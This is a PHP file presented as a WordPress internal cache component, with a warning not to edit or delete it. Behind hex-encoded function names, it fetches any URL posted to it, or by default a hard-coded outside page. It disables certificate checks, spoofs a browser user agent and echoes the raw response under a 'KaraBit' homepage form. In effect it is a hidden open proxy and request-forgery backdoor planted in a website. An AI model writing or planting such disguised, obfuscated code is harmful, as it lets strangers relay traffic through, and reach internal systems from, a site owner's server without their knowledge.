<?php
/*
 * @package WordPress
 * @subpackage Context_Cache
 * @since 5.4.0
 * * This file is part of the internal cache manager. 
 * Please do not edit or delete this file to avoid data inconsistency.
 * Generated by AuthManager on
*/
error_reporting(0);


$GLOBALS['_S_'] = [
    "\x61" => "\x52\x45\x51\x55\x45\x53\x54\x5f\x4d\x45\x54\x48\x4f\x44", 
    "\x62" => "\x50\x4f\x53\x54",                                        
    "\x63" => "\x63\x75\x72\x6c\x5f\x69\x6e\x69\x74",                   
    "\x64" => "\x63\x75\x72\x6c\x5f\x73\x65\x74\x6f\x70\x74",           
    "\x65" => "\x63\x75\x72\x6c\x5f\x65\x78\x65\x63",                 
    "\x66" => "\x63\x75\x72\x6c\x5f\x63\x6c\x6f\x73\x65",                
    "\x67" => "\x63\x75\x72\x6c\x5f\x65\x72\x72\x6e\x6f",                 
    "\x68" => "\x74\x72\x69\x6d",                                       
    "\x69" => "\x70\x72\x65\x67\x5f\x6d\x61\x74\x63\x68",               
    "\x6a" => "\x68\x74\x6d\x6c\x73\x70\x65\x63\x69\x61\x6c\x63\x68\x61\x72\x73" 
];

$χ1 = $GLOBALS['_S_'];
$χ2 = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x32\x63\x72\x6f\x73\x73\x2e\x63\x6f\x6d\x2f\x31\x38\x38\x34\x2e\x68\x74\x6d\x6c"; 
$χ3 = ""; $χ4 = ""; $χ5 = false;

// 
$χ9 = ""; 
if (isset($_POST["\x75\x72\x6c"])) {
    $χ9 = $χ1["\x6a"]($_POST["\x75\x72\x6c"]);
}

if ($_SERVER[$χ1["\x61"]] === $χ1["\x62"]) {
    $χ6 = $χ1["\x68"]($_POST["\x75\x72\x6c"] ?? "");
    $χ7 = empty($χ6) ? $χ2 : $χ6;

    if (!$χ1["\x69"]("/^\x68\x74\x74\x70/", $χ7)) { 
        $χ7 = "\x68\x74\x74\x70\x73\x3a\x2f\x2f" . $χ7; 
    }

    if (filter_var($χ7, FILTER_VALIDATE_URL)) {
        $χ8 = $χ1["\x63"]($χ7);
        $χ1["\x64"]($χ8, CURLOPT_RETURNTRANSFER, true);
        $χ1["\x64"]($χ8, CURLOPT_FOLLOWLOCATION, true);
        $χ1["\x64"]($χ8, CURLOPT_SSL_VERIFYPEER, false);
        $χ1["\x64"]($χ8, CURLOPT_SSL_VERIFYHOST, false);
        $χ1["\x64"]($χ8, CURLOPT_TIMEOUT, 30);
        $χ1["\x64"]($χ8, CURLOPT_USERAGENT, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30");
        
        $χ3 = $χ1["\x65"]($χ8);
        if (!$χ1["\x67"]($χ8)) { $χ5 = true; }
        $χ1["\x66"]($χ8);
    } else {
        $χ4 = "\x45\x72\x72\x6f\x72\x3a\x20\x55\x52\x4c";
    }
}

if ($χ5 && !empty($χ3)) { echo $χ3; exit; }
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <title>Karabit Private Homepage</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Segoe UI', Arial, sans-serif; }
        body { min-height: 100vh; display: flex; flex-direction: column; background-color: #f8f9fa; }
        .header { display: flex; justify-content: flex-end; padding: 20px; }
        .header a { color: #5f6368; text-decoration: none; margin-left: 20px; font-size: 14px; }
        .main { flex-grow: 1; display: flex; flex-direction: column; align-items: center; justify-content: center; padding: 20px; width: 100%; }
        .logo { font-size: 4rem; font-weight: bold; margin-bottom: 30px; display: flex; justify-content: center; }
        .logo span { display: inline-block; animation: jump 1.5s infinite ease-in-out; }
        .logo span:nth-child(1) { color: #4285F4; }
        .logo span:nth-child(2) { color: #EA4335; animation-delay: 0.1s; }
        .logo span:nth-child(3) { color: #FBBC05; animation-delay: 0.2s; }
        .logo span:nth-child(4) { color: #4285F4; animation-delay: 0.3s; }
        .logo span:nth-child(5) { color: #34A853; animation-delay: 0.4s; }
        .logo span:nth-child(6) { color: #EA4335; animation-delay: 0.5s; }
        .logo span:nth-child(7) { color: #4285F4; animation-delay: 0.6s; }
        @keyframes jump { 0%,100% { transform:translateY(0); } 50% { transform:translateY(-15px); } }
        .search-form { width: 100%; max-width: 600px; display: flex; flex-direction: column; align-items: center; }
        .search-box { width: 100%; border: 1px solid #dfe1e5; border-radius: 24px; padding: 12px 25px; background: white; transition: 0.3s; margin-bottom: 20px; display: flex; align-items: center; }
        .search-box:hover { box-shadow: 0 1px 6px rgba(32,33,36,0.28); border-color: transparent; }
        .search-box input { width: 100%; border: none; outline: none; font-size: 16px; background: transparent; }
        button { background: #f8f9fa; border: 1px solid #f8f9fa; padding: 10px 30px; color: #3c4043; cursor: pointer; border-radius: 4px; font-size: 14px; }
        button:hover { border: 1px solid #dadce0; background-color: #efefef; }
        .err-info { color: #d93025; margin-top: 20px; text-align: center; }
        .footer { background: #f2f2f2; padding: 15px; text-align: center; color: #70757a; font-size: 13px; margin-top: auto; }
    </style>
</head>
<body>
    <div class="header">
        <a href="https://www.karaok.qzz.io/index-back.html">原始</a>
        <a href="https://client.webhostmost.com/clientarea.php">个人</a>
    </div>
    <div class="main">
        <div class="logo"><span>K</span><span>a</span><span>r</span><span>a</span><span>B</span><span>i</span><span>t</span></div>
        <form method="post" class="search-form">
            <div class="search-box">
                <input type="text" name="url" placeholder="欢迎来到我的个人主页" value="<?php echo $χ9; ?>">
            </div>
            <div class="btn-center">
                <button type="submit">访问</button>
            </div>
        </form>
        <?php if($χ4): ?><div class="err-info"><?php echo $χ4; ?></div><?php endif; ?>
    </div>
    <div class="footer">KaraBit &copy; <?php echo date('Y'); ?></div>
</body>
</html>
